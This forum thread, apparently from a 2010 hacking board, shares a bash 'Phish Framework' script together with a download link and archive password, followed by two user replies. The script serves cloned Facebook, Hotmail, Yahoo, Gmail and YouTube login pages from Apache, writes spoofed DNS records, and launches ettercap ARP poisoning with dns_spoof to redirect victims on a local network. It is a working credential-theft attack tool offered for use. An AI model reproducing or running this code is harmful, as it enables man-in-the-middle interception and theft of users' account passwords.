Post Reply 
 
Thread Rating:
  • 1 Votes - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Phishing framework not finshed
04-06-2010, 01:55 AM
Post: #1
Phishing framework not finshed
i was never gonna release this but i need help haha



Code:
youtube() {

OS=`uname`

IO="" # store IP

case $OS in

   Linux) IP=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;

   *) IP="Unknown";;

esac

case $OS in

   Linux) GW='ip route show |grep "via" |awk '{print $3}'';;

   *) GW="Unknown";;

esac



clear

echo www.$men.com/signin? A $IP > /usr/share/ettercap/etter.dns

cp /root/Phish-Framework/phish/youtube/usernames.txt /var/www

cp /root/Phish-Framework/phish/youtube/next.php /var/www

cp /root/Phish-Framework/phish/youtube/index.php /var/www





chmod 777  /var/www/usernames.txt

chmod 777 /var/www/next.php

chmod 777 /var/www/index.php



xterm -fg white -bg black -e ettercap -i wlan0 -Tq -M arp:remote  /$GW/ -P dns_spoof



}



hlp() {

clear

cat << EOF



     ______  _     _ _____    _    _     _ _____ ______   ______

    (_____ \| |   | (_____)  | |  | |   | (_____)  ___ \ / _____)

     _____) ) |__ | |  _      \ \ | |__ | |  _  | |   | | /  ___

    |  ____/|  __)| | | |      \ \|  __)| | | | | |   | | | (___)

    | |     | |   | |_| |_ _____) ) |   | |_| |_| |   | | \____/|

    |_|     |_|   |_(_____|______/|_|   |_(_____)_|   |_|\_____/



                           Framework by Zero Cold









EOF

echo  "-s or show options to view phishers"

echo  "-h or help for this menu"

echo  "-S stop the apache server"

echo

echo

echo -n "Press return to continue:"



read hlp

if [ "$hlp" = "" ]

then

menu2

fi



}

options() {

/etc/init.d/apache2 start

clear

clear





echo "Please select a phisher to use: "

echo

ls -l /root/Phish-Framework/phish |awk '{print $9}'

echo

echo -n "LAK >"

read men



case "$men" in



  "facebook")

facebook

;;



  "hotmail")

hotmail

;;



  "yahoo")

yahoo

;;



"gmail" )

gmail

;;



"youtube" )

youtube

;;

esac



}

yahoo() {

OS=`uname`

IO="" # store IP

case $OS in

   Linux) IP=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;

   *) IP="Unknown";;

esac

case $OS in

   Linux) GW='ip route show |grep "via" |awk '{print $3}'';;

   *) GW="Unknown";;

esac



clear

echo www.$men.com/mail A $IP > /usr/share/ettercap/etter.dns

cp /root/Phish-Framework/phish/yahoo/usernames.txt /var/www

cp /root/Phish-Framework/phish/yahoo/next.php /var/www

cp /root/Phish-Framework/phish/yahoo/index.php /var/www





chmod 777  /var/www/usernames.txt

chmod 777 /var/www/next.php

chmod 777 /var/www/index.php



xterm -e ettercap -i wlan0 -Tq -M arp:remote  /$GW/ -P dns_spoof





}

gmail() {

OS=`uname`

IO="" # store IP

case $OS in

   Linux) IP=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;

   *) IP="Unknown";;

esac

case $OS in

   Linux) GW='ip route show |grep "via" |awk '{print $3}'';;

   *) GW="Unknown";;

esac



clear

echo www.$men.com A $IP > /usr/share/ettercap/etter.dns

cp /root/Phish-Framework/phish/gmail/usernames.txt /var/www

cp /root/Phish-Framework/phish/gmail/next.php /var/www

cp /root/Phish-Framework/phish/gmail/index.php /var/www





chmod 777  /var/www/usernames.txt

chmod 777 /var/www/next.php

chmod 777 /var/www/index.php



xterm -fg white -bg black -e ettercap -i wlan0 -Tq -M arp:remote  /$GW/ -P dns_spoof





}

hotmail() {

OS=`uname`

IO="" # store IP

case $OS in

   Linux) IP=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;

   *) IP="Unknown";;

esac

case $OS in

   Linux) GW='ip route show |grep "via" |awk '{print $3}'';;

   *) GW="Unknown";;

esac



clear

echo www.$men.com A $IP > /usr/share/ettercap/etter.dns

cp /root/Phish-Framework/phish/hotmail/usernames.txt /var/www

cp /root/Phish-Framework/phish/hotmail/next.php /var/www

cp /root/Phish-Framework/phish/hotmail/index.php /var/www





chmod 777  /var/www/usernames.txt

chmod 777 /var/www/next.php

chmod 777 /var/www/index.php



xterm -fg white -bg black -e ettercap -i wlan0 -Tq -M arp:remote  /$GW/ -P dns_spoof





}

leave() {

killall apache2

rm /var/www/index.php

rm /var/www/next.php

rm /var/www/usernames.txt



clear

exit

}

facebook() {

OS=`uname`

IO="" # store IP

case $OS in

   Linux) IP=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;

   *) IP="Unknown";;

esac

case $OS in

   Linux) GW='ip route show |grep "via" |awk '{print $3}'';;

   *) GW="Unknown";;

esac



clear

echo www.$men.com A $IP > /usr/share/ettercap/etter.dns

cp /root/Phish-Framework/phish/facebook/usernames.txt /var/www

cp /root/Phish-Framework/phish/facebook/next.php /var/www

cp /root/Phish-Framework/phish/facebook/index.php /var/www





chmod 777  /var/www/usernames.txt

chmod 777 /var/www/next.php

chmod 777 /var/www/index.php



xterm -fg white -bg black -e ettercap -i wlan0 -Tq -M arp:remote  /$GW/ -P dns_spoof





}



menu1() {

clear



FILE="/tmp/count.txt"

ls /root/Phish-Framework/phish > $FILE

echo "$(grep [^*$] $FILE -c)"

killall apache2

clear

cat << EOF



     ______  _     _ _____    _    _     _ _____ ______   ______

    (_____ \| |   | (_____)  | |  | |   | (_____)  ___ \ / _____)

     _____) ) |__ | |  _      \ \ | |__ | |  _  | |   | | /  ___

    |  ____/|  __)| | | |      \ \|  __)| | | | | |   | | | (___)

    | |     | |   | |_| |_ _____) ) |   | |_| |_| |   | | \____/|

    |_|     |_|   |_(_____|______/|_|   |_(_____)_|   |_|\_____/



                           Framework by Zero Cold







         =[ Version v1.0

         =[ Phishers Loaded $(grep [^*$] $FILE -c)









EOF

echo -n "LAK >"

}



menu2() {



   while true

   do

   menu1

   read answer

   case $answer in



   "help" | "-h" )

    hlp

    ;;



  "show options" | "-s" )

      options

    ;;



  "-S" )

     /etc/init.d/apache2 stop

   ;;



   exit)

      exit

  ;;

   clear)

     clear

  ;;

   *)

     menu2

  ;;

   esac

   done

}



case "$1" in

    help)

   menu2

  ;;



    file)

      filoop

   ;;



    text)

   procloop

  ;;



   status)

   statloop

  ;;    



    *)

   menu2

  ;;

esac
need help with the phiser pages logging in to the accounts



u can download full thing here



Code:
http://www.4shared.com/file/182144504/37fc5a0f/Phish-Framework.html
Password



Code:
ZeroCold



video in action



Code:
http://h4ck3z.blip.tv/file/2978157/
Find all posts by this user
Quote this message in a reply
05-22-2010, 03:54 PM
Post: #2
RE: Phishing framework not finshed
dear sir

i hv already download the phish framework, i tried but it seems, it didn't work.
when i typed show options :http://i45.tinypic.com/261z7.png
and when i tried to type 1 or 2 . it was back again from the beginning

can you tell me why?

tks
Find all posts by this user
Quote this message in a reply
07-04-2010, 06:43 AM
Post: #3
RE: Phishing framework not finshed
(05-22-2010 03:54 PM)kataibrengsek Wrote:  dear sir

i hv already download the phish framework, i tried but it seems, it didn't work.
when i typed show options :http://i45.tinypic.com/261z7.png
and when i tried to type 1 or 2 . it was back again from the beginning

can you tell me why?

tks

yeh seam me! any update for that?
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump: